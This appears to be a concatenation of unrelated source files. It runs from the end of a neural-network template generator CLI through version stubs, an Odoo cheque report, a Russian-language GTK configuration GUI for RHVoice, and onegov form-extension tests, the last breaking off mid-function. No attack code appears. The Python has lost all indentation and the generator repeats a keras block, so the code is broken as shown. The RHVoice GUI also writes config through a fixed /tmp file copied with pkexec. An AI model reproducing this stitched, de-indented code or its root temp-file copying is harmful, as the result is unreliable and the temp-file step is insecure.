| $$ | $$ | $$ | $$ | $$ |__/
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$ | $$ | $$ /$$$$$$ /$$$$$$| $$ /$$/$$/$$$$$$$ /$$$$$$
| $$$$$$$$|____ $$/$$__ $$/$$__ $| $$ | $$ | $$$$$$$$|____ $$/$$_____| $$ /$$| $| $$__ $$/$$__ $$
| $$__ $$ /$$$$$$| $$ \ $| $$ \ $| $$ | $$ | $$__ $$ /$$$$$$| $$ | $$$$$$/| $| $$ \ $| $$ \ $$
| $$ | $$/$$__ $| $$ | $| $$ | $| $$ | $$ | $$ | $$/$$__ $| $$ | $$_ $$| $| $$ | $| $$ | $$
| $$ | $| $$$$$$| $$$$$$$| $$$$$$$| $$$$$$$ | $$ | $| $$$$$$| $$$$$$| $$ \ $| $| $$ | $| $$$$$$$
|__/ |__/\_______| $$____/| $$____/ \____ $$ |__/ |__/\_______/\_______|__/ \__|__|__/ |__/\____ $$
| $$ | $$ /$$ | $$ /$$ \ $$
| $$ | $$ | $$$$$$/ | $$$$$$/
|__/ |__/ \______/ \______/
"""
)
if args.init is not None:
print("args",args.init)
createfile(args.init)
print("init files")
if args.run:
print("running files")
par = code_generate()
par.generatefiles()
if args.gen:
if args.gen == 'cnn':
if args.backend == 'tensorflow2.0':
print("generating tf files")
path = '/mlm_templates/cnn_tensorflow2.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.backend == 'keras':
print("generating keras files")
path = '/mlm_templates/cnn_keras.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.gen == 'ann':
if args.backend == 'tensorflow2.0':
print("generating tf files")
path = '/mlm_templates/ann_tensorflow2.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.backend == 'keras':
print("generating keras files")
path = '/mlm_templates/ann_keras.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.backend == 'keras':
print("generating keras files")
path = '/mlm_templates/ann_keras.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.gen == 'lstm':
if args.backend == 'keras':
print("generating keras files")
path = '/mlm_templates/lstm_keras.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
print("my file",myFile)
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
if args.backend == 'tensorflow 2.0':
print("generating keras files")
path = '/mlm_templates/lstm_tensorflow2.mlm'
filepath = pkg_resources.resource_filename(__name__, path)
yamlfile = yaml.load(open(filepath))
myFile = readfile()
yamlfile['file'] = myFile.split('.')[0]
yamlfile['type'] = args.type
with open(myFile, 'w') as outfile:
yaml.dump(yamlfile, outfile,default_flow_style=False, sort_keys=False)
return("")
if __name__ == '__main__':
main()
|
# Set the version number for the current release of the XSTOOLs user scripts.
VERSION = '6.0.9'
|
from __future__ import unicode_literals
VERSION = '0.1'
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class ReceiptCashCheck(models.AbstractModel):
_name = 'report.raqmi_cheque.receipt_check_cash_payment'
@api.model
def _get_report_values(self, docids, data=None):
report_obj = self.env['ir.actions.report']
report = report_obj._get_report_from_name('raqmi_cheque.receipt_check_cash_payment')
docargs = {
'doc_ids': docids,
'doc_model': 'normal.payments',
'docs': self.env['normal.payments'].browse(docids),
'payment_info': self._payment_info,
'convert': self._convert
}
return docargs
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
GUI для настройки rhvoice.
"""
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
import configparser
import os
from os.path import exists as path_exists
from os.path import expanduser
from shlex import quote
from rhvoice_tools import rhvoice_say
class MainWindow(Gtk.Window):
"""
Основное окно настроек.
"""
def __init__(self):
Gtk.Window.__init__(self, title="Настройки RHVoice")
self.connect("delete-event", self.exit_app)
self.config = Config()
self.global_config = RHVoiceConfig()
self.notebook = Gtk.Notebook()
self.notebook.set_vexpand(True)
self.box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.box.add(self.notebook)
self.add(self.box)
bottom_panel, self.test_btn, self.apply_btn = self.build_bottom_panel()
self.box.add(bottom_panel)
index = self.notebook.append_page(self.build_rhvoice_say_page(),
Gtk.Label(label='rhvoice_say'))
if len(self.global_config.options.dict):
self.gl_opts_grid = self.build_rhvoice_conf_page()
self.notebook.append_page(self.gl_opts_grid,
Gtk.Label(label='RHVoice.conf'))
self.read_say_conf()
self.show_all()
self.notebook.set_current_page(index)
def build_bottom_panel(self):
"""
Нижняя панель с кнопками "Применить" и "Тест".
"""
bottom_panel = Gtk.Box(hexpand=True)
test_btn = Gtk.Button(label='Тест', margin=5)
test_btn.connect('clicked', self.run_test)
test_btn.set_halign(Gtk.Align.START)
bottom_panel.pack_start(test_btn, True, True, 5)
apply_btn = Gtk.Button(label='Применить', margin=5)
apply_btn.set_halign(Gtk.Align.END)
bottom_panel.pack_start(apply_btn, True, True, 5)
apply_btn.connect('clicked', self.apply)
return bottom_panel, test_btn, apply_btn
def build_rhvoice_say_page(self):
"""
Вкладка с настройками rhvoice_say.
"""
conf_page_say = Gtk.Grid()
conf_page_say.set_column_spacing(10)
conf_page_say.set_row_spacing(5)
conf_page_say.set_border_width(10)
page_label = Gtk.Label(label='Настройки rhvoice_say')
page_label.set_hexpand(True)
page_label.set_margin_bottom(10)
row = 0
conf_page_say.attach(page_label, 0, row, 3, 1)
row += 1
use_spd_label = Gtk.Label(
label='Использовать Speech Dispatcher:')
use_spd_label.set_halign(Gtk.Align.START)
conf_page_say.attach(use_spd_label, 0, row, 1, 1)
self.use_spd_sw = Gtk.Switch()
self.use_spd_sw.set_halign(Gtk.Align.END)
conf_page_say.attach(self.use_spd_sw, 1, row, 1, 1)
row += 1
item_label = Gtk.Label(label='Громкость:')
item_label.set_halign(Gtk.Align.START)
conf_page_say.attach(item_label, 0, row, 1, 1)
self.volume_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
-100, 100, 1)
self.volume_scale.set_size_request(100, -1)
conf_page_say.attach(self.volume_scale, 1, row, 2, 1)
row += 1
item_label = Gtk.Label(label='Скорость:')
item_label.set_halign(Gtk.Align.START)
conf_page_say.attach(item_label, 0, row, 1, 1)
self.rate_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
-100, 100, 1)
conf_page_say.attach(self.rate_scale, 1, row, 2, 1)
row += 1
item_label = Gtk.Label(label='Высота:')
item_label.set_halign(Gtk.Align.START)
conf_page_say.attach(item_label, 0, row, 1, 1)
self.pitch_scale = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,
-100, 100, 1)
conf_page_say.attach(self.pitch_scale, 1, row, 2, 1)
row += 1
item_label = Gtk.Label(label='Голос:')
item_label.set_halign(Gtk.Align.START)
conf_page_say.attach(item_label, 0, row, 1, 1)
self.combo_voice = Gtk.ComboBoxText()
conf_page_say.attach(self.combo_voice, 1, row, 2, 1)
row += 1
item_label = Gtk.Label(label='Символ ударения:')
item_label.set_halign(Gtk.Align.START)
conf_page_say.attach(item_label, 0, row, 1, 1)
self.use_stress_sw = Gtk.Switch()
self.use_stress_sw.set_halign(Gtk.Align.END)
conf_page_say.attach(self.use_stress_sw, 1, row, 1, 1)
self.entry_stress = Gtk.Entry(xalign=0.5)
self.entry_stress.set_max_length(1)
conf_page_say.attach(self.entry_stress, 2, row, 1, 1)
self.use_stress_sw.set_tooltip_text(
'Включите для дополнительной обработки с использованием символа '
'ударения.\n'
'(cимвол должен совпадать с указанным в настройках rhvoice)')
self.entry_stress.set_tooltip_text(
'Cимвол должен совпадать с указанным в настройках rhvoice')
self.use_stress_sw.connect('state-set', self.stress_changed)
return conf_page_say
def build_rhvoice_conf_page(self, conf_page=None):
"""
Вкладка с глобальными настройками RHVoice.conf.
conf_page - Gtk.Grid
"""
if conf_page is None:
conf_page = Gtk.Grid()
conf_page.set_column_spacing(10)
conf_page.set_row_spacing(5)
conf_page.set_border_width(10)
page_label = Gtk.Label(label='Настройки из файла RHVoice.conf')
page_label.set_hexpand(True)
page_label.set_margin_bottom(10)
row = 0
conf_page.attach(page_label, 0, row, 3, 1)
for option_name, option in self.global_config.options.dict.items():
if not option.enabled:
# пропускаем неактивные (закомментированные) параметры
continue
# название параметра
row += 1
if option.description:
lbl = option.description
else:
lbl = option.name
item_label = Gtk.Label(label=lbl)
item_label.set_halign(Gtk.Align.START)
conf_page.attach(item_label, 0, row, 1, 1)
# значение параметра
if option.kind in ('text', 'char'):
entry = Gtk.Entry(xalign=0.5)
if option.kind == 'char':
entry.set_max_length(1)
entry.set_text(option.value)
entry.set_tooltip_text(option.tooltip)
entry.connect('changed', self.entry_changed, option)
conf_page.attach(entry, 1, row, 1, 1)
elif option.kind == 'list':
combo = Gtk.ComboBoxText()
for i, value in enumerate(('min', 'standard', 'max')):
combo.append(str(i), value)
if value == option.value:
combo.set_active(i)
combo.set_tooltip_text(option.tooltip)
combo.connect('changed', self.combo_changed, option)
conf_page.attach(combo, 1, row, 1, 1)
elif option.kind == 'bool':
switch = Gtk.Switch()
switch.set_halign(Gtk.Align.END)
switch.set_active(option.value)
switch.set_tooltip_text(option.tooltip)
switch.connect('state-set', self.switch_changed, option)
conf_page.attach(switch, 1, row, 1, 1)
else:
item_label = Gtk.Label(label=option.value)
item_label.set_tooltip_text(option.tooltip)
item_label.set_halign(Gtk.Align.CENTER)
conf_page.attach(item_label, 1, row, 1, 1)
row += 1
open_editor = Gtk.Button(label='Открыть в редакторе', margin=10)
open_editor.set_tooltip_text('Для изменения файла настроек '
'требуются права root.')
open_editor.set_halign(Gtk.Align.CENTER)
open_editor.connect("clicked", self.open_editor)
conf_page.attach(open_editor, 0, row, 3, 1)
conf_page.show_all()
return conf_page
def open_editor(self, widget=None):
"""
Открывает редактор настроек и после обновляет данные в окне.
"""
self.global_config.open_editor()
self.update_data()
def update_data(self):
"""
Обновление данных на вкладке RHVoice.conf.
"""
self.global_config.update()
self.gl_opts_grid.foreach(self.gl_opts_grid.remove)
self.build_rhvoice_conf_page(self.gl_opts_grid)
def read_say_conf(self):
"""
Обновление настроек из файла.
"""
self.use_spd_sw.set_active(self.config.use_SD)
self.volume_scale.set_value(self.config.volume)
self.rate_scale.set_value(self.config.rate)
self.pitch_scale.set_value(self.config.pitch)
# заполняем комбобокс и устанавливаем текущий синтезатор в нём
self.combo_voice.remove_all()
for i, voice in enumerate(self.config.voices):
self.combo_voice.append(str(i), voice)
if voice == self.config.voice:
self.combo_voice.set_active(i)
self.stress_marker = self.config.stress_marker
if self.stress_marker == False:
self.use_stress_sw.set_active(False)
self.entry_stress.set_text('')
self.entry_stress.set_sensitive(False)
else:
self.use_stress_sw.set_active(True)
self.entry_stress.set_text(self.stress_marker)
self.entry_stress.set_sensitive(True)
def entry_changed(self, entry, option):
"""
Изменение параметра пользователем.
"""
option.value = entry.get_text()
def combo_changed(self, combo, option):
"""
Изменение параметра пользователем.
"""
option.value = combo.get_active_text()
def switch_changed(self, switch, state, option):
"""
Изменение параметра пользователем.
"""
option.value = switch.get_active()
def stress_changed(self, widget, state):
"""
Обработка переключателя "Символ ударения"
"""
self.entry_stress.set_sensitive(state)
def apply(self, widget=None):
"""
Применение настроек в зависимости от открытой вкладки.
"""
if self.notebook.get_current_page() == 0:
self.apply_say_conf()
else:
self.global_config.write_conf()
self.update_data()
def apply_say_conf(self):
"""
Применение настроек для rhvoice_say.
"""
self.config.use_SD = self.use_spd_sw.get_active()
self.config.volume = self.volume_scale.get_value()
self.config.rate = self.rate_scale.get_value()
self.config.pitch = self.pitch_scale.get_value()
self.config.voice = self.combo_voice.get_active_text()
if self.use_stress_sw.get_active() and self.entry_stress.get_text():
self.config.stress_marker = self.entry_stress.get_text()
else:
self.config.stress_marker = False
self.config.write_conf()
self.read_say_conf()
def run_test(self, widget=None):
"""
Воспроизведение тестового сообщения.
"""
rhvoice_say('Проверка настройки синтезатора rhvoice')
def exit_app(self, widget, event):
"""
Выход.
"""
Gtk.main_quit()
class Config():
"""
Чтение и запись настроек rhvoice_say.
"""
def __init__(self):
# файл конфигурации
self.file_name = expanduser("~") + '/.config/rhvoice_say.conf'
self.config = configparser.ConfigParser(allow_no_value=True)
# с учетом регистра
self.config.optionxform = str
self.voices = self.get_voices()
if self.voices is None:
self.voices = ['Aleksandr', 'Aleksandr+Alan', 'Anna', 'Arina',
'Artemiy', 'Elena', 'Elena+Clb', 'Irina', 'Pavel',
'Victoria']
self.voices.sort()
# установка настроек по-умолчанию
self.use_SD = False
self.voice = 'Aleksandr+Alan'
self.volume = 0
self.rate = 0
self.pitch = 0
self.stress_marker = False
self.read_conf()
def get_voices(self):
"""
Поиск доступных русских голосов.
"""
voices_dir = '/usr/share/RHVoice/voices'
if not path_exists(voices_dir):
return None
all_voices = os.listdir(voices_dir)
voices_list = []
voice_config = configparser.ConfigParser()
for voice in all_voices:
voice_info = os.path.join(voices_dir, voice, 'voice.info')
if not path_exists(voice_info):
continue
with open(voice_info, 'r') as f:
config_string = '[root]\n' + f.read()
voice_config.read_string(config_string)
# поиск только русских голосов
if voice_config['root'].get('language') == 'Russian':
voice_name = voice_config['root'].get('name')
voices_list.append(voice_name)
if voices_list:
return voices_list
else:
return None
def read_conf(self):
"""
Чтение настроек из файла.
"""
# открываем файл конфигурации
if not path_exists(self.file_name):
# если его нет - создаем новый
self.write_conf()
self.config.read(self.file_name)
settings = self.config['Settings']
self.use_SD = settings.getboolean('use_speech_dispatcher')
self.voice = settings.get('voice')
self.volume = settings.getint('volume')
self.rate = settings.getint('rate')
self.pitch = settings.getint('pitch')
self.stress_marker = settings.get('use_stress_marker')
if (self.stress_marker is None) or (self.stress_marker == 'False'):
self.stress_marker = False
def write_conf(self):
"""
Запись в файл настроек.
"""
self.config['Settings'] = {
"; Использовать Speech Dispatcher для чтения ('True' или 'False')": None,
'use_speech_dispatcher': self.use_SD,
'; Громкость в процентах (от -100 до 100)': None,
'volume': int(self.volume),
'; Скорость в процентах (от -100 до 100)': None,
'rate': int(self.rate),
'; Высота в процентах (от -100 до 100)': None,
'pitch': int(self.pitch),
'; Голос для чтения': None,
'voice': self.voice,
'; Использовать символ для указания ударения (False или символ)': None,
'use_stress_marker': self.stress_marker}
with open(self.file_name, 'w') as configfile:
self.config.write(configfile)
class RHVoiceConfig:
"""
Глобальные настройки RHVoice.
"""
def __init__(self):
"""
Инициализация.
"""
self.conf_file = None
self.options = RHVoiceOptions()
self.find_file()
self.parse_conf()
def find_file(self):
"""
Поиск конфигурационного файла.
"""
for path in ('/etc/RHVoice/RHVoice.conf',
'/usr/local/etc/RHVoice/RHVoice.conf'):
if path_exists(path):
self.conf_file = quote(path)
break
# TODO: доделать поиск в других местах и организовать выбор расположения
def parse_conf(self):
"""
Чтение всех найденных параметров из настроек в словарь.
"""
if self.conf_file is None:
return
try:
f = open(self.conf_file, 'r') # открываем файл на чтение
except:
f = None
return
for line in f:
# удаление пробелов в начале и конце строки
line = line.strip()
# пропуск комментариев и пустых строк
if line.startswith(';') or len(line) == 0:
continue
# удаление лишних пробелов
line = " ".join(line.split())
option = line.split('=')
if len(option) == 2:
option_rec = self.options.dict.get(option[0])
if option_rec is not None:
# изменение стандартного параметра
if option_rec.kind == 'bool':
option_rec.value = self.str_to_bool(option[1])
else:
option_rec.value = option[1]
option_rec.enabled=True
else:
# добавление пользовательского параметра
self.options.dict[option[0]] = ConfigOption(
name = option[0], value = option[1], enabled=True)
if f is not None:
f.close
def str_to_bool(self, value):
return value in ('true', 'yes', 'on', '1')
def bool_to_str(self, value):
if value:
return 'true'
return 'false'
def open_editor(self, widget=None):
"""
Открывает файл настроек в редакторе (по умолчанию для пользователя).
"""
if self.conf_file is not None:
if os.access(self.conf_file, os.W_OK):
os.system("xdg-open " + self.conf_file)
else:
# поиск редактора пользователя
mime_type = Gio.content_type_guess(self.conf_file)
app_infos = Gio.app_info_get_all_for_type(mime_type[0])
if len(app_infos) > 0:
app_bin = app_infos[0].get_executable()
# запуск редактора с правами root
env = 'DISPLAY=$DISPLAY XAUTHORITY=$XAUTHORITY'
os.system("pkexec env %s %s %s"
% (env, quote(app_bin), self.conf_file))
def write_conf(self):
"""
Запись изменений в файл.
"""
if self.conf_file is None:
return
try:
f = open(self.conf_file, 'r') # открываем файл на чтение
except:
f = None
return
content = ''
last_line = '' # для удаления несокльких пустых строк подряд
for line in f:
# удаление пробелов в начале и конце строки
line = line.strip()
# обработка комментариев и пустых строк
if line.startswith(';') or len(line) == 0:
if line != last_line:
content += line + '\n'
last_line = line
continue
# удаление лишних пробелов
line = " ".join(line.split())
option = line.split('=')
if len(option) == 2:
opt_rec = self.options.get(option[0])
if opt_rec is not None:
if opt_rec.kind == 'bool':
content += (opt_rec.name + '=' +
self.bool_to_str(opt_rec.value) + '\n')
else:
content += opt_rec.name + '=' + opt_rec.value + '\n'
else:
content += line + '\n'
else:
content += line + '\n'
last_line = line
if f is not None:
f.close
# запись изменений в файл из-под root
os.system("echo %s > /tmp/rhvoice_conf_tmp" % quote(content))
os.system("pkexec cp /tmp/rhvoice_conf_tmp %s" % self.conf_file)
def update(self):
"""
Обновление данных из изменённого файла.
"""
self.options.clear()
self.parse_conf()
class ConfigOption():
"""
Прототип параметра.
"""
def __init__(self, name, value,
default=None, description='', tooltip='', kind='any',
limits = (None, None), values_list=[], enabled=False):
self.name = name # название параметра в конфиге
self.value = value # значение
self.description = description # короткое описание
self.tooltip = tooltip # объяснение
# тип параметра: 'float', 'text', 'list', 'char', 'bool' ,'any'
self.kind = kind
self.default = default # значение по умолчанию
self.limits = limits # ограничения (min, max)
self.values_list = values_list # список доступных значений
self.enabled = enabled # активность параметра
class RHVoiceOptions():
"""
Параметры в RHVoice.conf.
"""
def __init__(self):
self.dict = {}
self.clear()
def clear(self):
"""
Очистка и установка параметров по умолчанию.
"""
self.dict.clear()
self.dict['quality'] = ConfigOption(
name='quality',
value='standard',
description='Качество речи',
tooltip = 'Доступные значения:\n'
'min (максимальное быстродействие),\n'
'standard (стандартное качество),\n'
'max (максимальное возможное качество, но с задержками '
'при синтезе длинных предложений).',
kind = 'list',
values_list = ('min', 'standard', 'max'),
default = 'standard')
self.dict['stress_marker'] = ConfigOption(
name='stress_marker',
value='',
description='Символ ударения',
tooltip = 'Символ, который в тексте будет указывать, что на '
'непосредственно следующую за ним гласную падает '
'ударение (только русский текст).',
kind = 'char')
self.dict['languages.Russian.use_pseudo_english'] = ConfigOption(
name='languages.Russian.use_pseudo_english',
value=False,
description='Псевдо-английский для русских голосов',
tooltip = 'Включить поддержку псевдо-английского для русских '
'голосов.',
kind = 'bool',
default = False)
self.dict['voice_profiles'] = ConfigOption(
name='voice_profiles',
value='Aleksandr+Alan,Elena+CLB',
description='Список голосовых профилей',
tooltip = 'Первым в профиле указывается основной голос '
'(он будет читать числа и другой текст, для которого '
'не удаётся автоматически определить язык). '
'Далее следуют дополнительные голоса. '
'Если в профиле заданы два голоса, чьи языки имеют '
'общие буквы, то второй будет использоваться только в '
'том случае, когда программа экранного доступа '
'специально запросит использование данного языка.',
kind = 'text',
default = 'Aleksandr+Alan,Elena+CLB')
def get(self, option):
"""
Чтение параметра по имени.
Если параметр не задан или отсутсвует возвращает "None".
"""
return self.dict.get(option)
def main():
"""
Запуск.
"""
win = MainWindow()
Gtk.main()
if __name__ == '__main__':
main()
|
from onegov.core.utils import Bunch
from onegov.form import Form
from onegov.form.extensions import Extendable
from onegov.org.models import (
PersonLinkExtension, ContactExtension, AccessExtension, HoneyPotExtension
)
from uuid import UUID
def test_disable_extension():
class Topic(AccessExtension):
meta = {}
class TopicForm(Form):
pass
topic = Topic()
request = Bunch(**{'app.settings.org.disabled_extensions': []})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'access' in form._fields
topic = Topic()
request = Bunch(**{
'app.settings.org.disabled_extensions': ['AccessExtension']
})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'access' not in form._fields
def test_access_extension():
class Topic(AccessExtension):
meta = {}
class TopicForm(Form):
pass
topic = Topic()
assert topic.access == 'public'
request = Bunch(**{'app.settings.org.disabled_extensions': []})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'access' in form._fields
assert form.access.data == 'public'
form.access.data = 'private'
form.populate_obj(topic)
assert topic.access == 'private'
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
form.process(obj=topic)
assert form.access.data == 'private'
form.access.data = 'member'
form.populate_obj(topic)
assert topic.access == 'member'
def test_person_link_extension():
class Topic(PersonLinkExtension):
content = {}
def get_selectable_people(self, request):
return [
Bunch(
id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
title='Troy Barnes'
),
Bunch(
id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
title='Abed Nadir'
)
]
class TopicForm(Form):
pass
topic = Topic()
assert topic.people is None
request = Bunch(**{
'translate': lambda text: text,
'app.settings.org.disabled_extensions': []
})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'people_6d120102d90344868eb32614cf3acb1a' in form._fields
assert 'people_6d120102d90344868eb32614cf3acb1a_function' in form._fields
assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96' in form._fields
assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96_function' in form._fields
form.people_6d120102d90344868eb32614cf3acb1a.data = True
form.update_model(topic)
assert topic.content['people'] == [
('6d120102d90344868eb32614cf3acb1a', (None, False))
]
form.people_6d120102d90344868eb32614cf3acb1a_function.data \
= 'The Truest Repairman'
form.update_model(topic)
assert topic.content['people'] == [
('6d120102d90344868eb32614cf3acb1a', ('The Truest Repairman', False))
]
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
form.apply_model(topic)
assert form.people_6d120102d90344868eb32614cf3acb1a.data is True
assert form.people_6d120102d90344868eb32614cf3acb1a_function.data \
== 'The Truest Repairman'
assert form.people_6d120102d90344868eb32614cf3acb1a_is_visible_function\
.data == False
assert not form.people_adad98ff74e2497a9e1dfbba0a6bbe96.data
assert not form.people_adad98ff74e2497a9e1dfbba0a6bbe96_function.data
def test_person_link_extension_duplicate_name():
class Topic(PersonLinkExtension):
content = {}
def get_selectable_people(self, request):
return [
Bunch(
id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
title='Foo'
),
Bunch(
id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
title='Foo'
)
]
class TopicForm(Form):
pass
topic = Topic()
assert topic.people is None
request = Bunch(**{
'translate': lambda text: text,
'app.settings.org.disabled_extensions': []
})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'people_6d120102d90344868eb32614cf3acb1a' in form._fields
assert 'people_6d120102d90344868eb32614cf3acb1a_function' in form._fields
assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96' in form._fields
assert 'people_adad98ff74e2497a9e1dfbba0a6bbe96_function' in form._fields
def test_person_link_extension_order():
class Topic(PersonLinkExtension):
content = {}
def get_selectable_people(self, request):
return [
Bunch(
id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
title='Troy Barnes'
),
Bunch(
id=UUID('aa37e9cc-40ab-402e-a70b-0d2b4d672de3'),
title='Annie Edison'
),
Bunch(
id=UUID('adad98ff-74e2-497a-9e1d-fbba0a6bbe96'),
title='Abed Nadir'
),
Bunch(
id=UUID('f0281b55-8a5f43f6-ac81-589d79538a87'),
title='Britta Perry'
)
]
class TopicForm(Form):
pass
request = Bunch(**{
'translate': lambda text: text,
'app.settings.org.disabled_extensions': []
})
topic = Topic()
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
form.people_6d120102d90344868eb32614cf3acb1a.data = True
form.people_f0281b558a5f43f6ac81589d79538a87.data = True
form.update_model(topic)
# the people are kept sorted by lastname, firstname by default
assert topic.content['people'] == [
('6d120102d90344868eb32614cf3acb1a', (None, False)), # Troy _B_arnes
('f0281b558a5f43f6ac81589d79538a87', (None, False)) # Britta _P_erry
]
form.people_aa37e9cc40ab402ea70b0d2b4d672de3.data = True
form.update_model(topic)
assert topic.content['people'] == [
('6d120102d90344868eb32614cf3acb1a', (None, False)), # Troy _B_arnes
('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)), # Annie _E_dison
('f0281b558a5f43f6ac81589d79538a87', (None, False)) # Britta _P_erry
]
# once the order changes, people are added at the end
topic.move_person(
subject='f0281b558a5f43f6ac81589d79538a87', # Britta
target='6d120102d90344868eb32614cf3acb1a', # Troy
direction='above'
)
assert topic.content['people'] == [
('f0281b558a5f43f6ac81589d79538a87', (None, False)), # Britta _P_erry
('6d120102d90344868eb32614cf3acb1a', (None, False)), # Troy _B_arnes
('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)), # Annie _E_dison
]
topic.move_person(
subject='6d120102d90344868eb32614cf3acb1a', # Troy
target='aa37e9cc40ab402ea70b0d2b4d672de3', # Annie
direction='below'
)
assert topic.content['people'] == [
('f0281b558a5f43f6ac81589d79538a87', (None, False)), # Britta _P_erry
('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)), # Annie _E_dison
('6d120102d90344868eb32614cf3acb1a', (None, False)), # Troy _B_arnes
]
form.people_adad98ff74e2497a9e1dfbba0a6bbe96.data = True
form.update_model(topic)
assert topic.content['people'] == [
('f0281b558a5f43f6ac81589d79538a87', (None, False)), # Britta _P_erry
('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)), # Annie _E_dison
('6d120102d90344868eb32614cf3acb1a', (None, False)), # Troy _B_arnes
('adad98ff74e2497a9e1dfbba0a6bbe96', (None, False)), # Abed _N_adir
]
def test_person_link_move_function():
class Topic(PersonLinkExtension):
content = {}
def get_selectable_people(self, request):
return [
Bunch(
id=UUID('aa37e9cc-40ab-402e-a70b-0d2b4d672de3'),
title="Joe Biden"
),
Bunch(
id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
title="Barack Obama"
),
]
class TopicForm(Form):
pass
topic = Topic()
request = Bunch(**{
'translate': lambda text: text,
'app.settings.org.disabled_extensions': []
})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
form.people_6d120102d90344868eb32614cf3acb1a.data = True
form.people_6d120102d90344868eb32614cf3acb1a_function.data = "President"
form.people_aa37e9cc40ab402ea70b0d2b4d672de3.data = True
form.people_aa37e9cc40ab402ea70b0d2b4d672de3_function.data = \
"Vice-President"
form.update_model(topic)
assert topic.content['people'] == [
('aa37e9cc40ab402ea70b0d2b4d672de3', ("Vice-President", False)),
('6d120102d90344868eb32614cf3acb1a', ("President", False))
]
topic.move_person(
subject='6d120102d90344868eb32614cf3acb1a',
target='aa37e9cc40ab402ea70b0d2b4d672de3',
direction='above'
)
assert topic.content['people'] == [
('6d120102d90344868eb32614cf3acb1a', ("President", False)),
('aa37e9cc40ab402ea70b0d2b4d672de3', ("Vice-President", False)),
]
def test_contact_extension():
class Topic(ContactExtension):
content = {}
class TopicForm(Form):
pass
topic = Topic()
assert topic.contact is None
assert topic.contact_html is None
request = Bunch(**{'app.settings.org.disabled_extensions': []})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'contact' in form._fields
form.contact.data = (
"Steve Jobs\n"
"steve@apple.com\n"
"https://www.apple.com"
)
form.populate_obj(topic)
assert topic.contact == (
"Steve Jobs\n"
"steve@apple.com\n"
"https://www.apple.com"
)
assert topic.contact_html == (
'<p><span class="title">'
'Steve Jobs</span></p>'
'<p><a href="mailto:steve@apple.com">steve@apple.com</a><br>'
'<a href="https://www.apple.com" rel="nofollow">'
'https://www.apple.com</a>'
'</p>'
)
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
form.process(obj=topic)
assert form.contact.data == (
"Steve Jobs\n"
"steve@apple.com\n"
"https://www.apple.com"
)
def test_contact_extension_with_top_level_domain_agency():
class Topic(ContactExtension):
content = {}
class TopicForm(Form):
pass
topic = Topic()
assert topic.contact is None
assert topic.contact_html is None
request = Bunch(**{'app.settings.org.disabled_extensions': []})
form_class = topic.with_content_extensions(TopicForm, request=request)
form = form_class()
assert 'contact' in form._fields
form.contact.data = (
"longdomain GmbH\n"
"hello@website.agency\n"
"https://custom.longdomain"
)
form.populate_obj(topic)
assert topic.contact == (
"longdomain GmbH\n"
"hello@website.agency\n"
"https://custom.longdomain"
)
d = topic.contact_html
assert '<a href="mailto:hello@website.ag"' not in d
def test_honeypot_extension():
class Submission(Extendable, HoneyPotExtension):
meta = {}
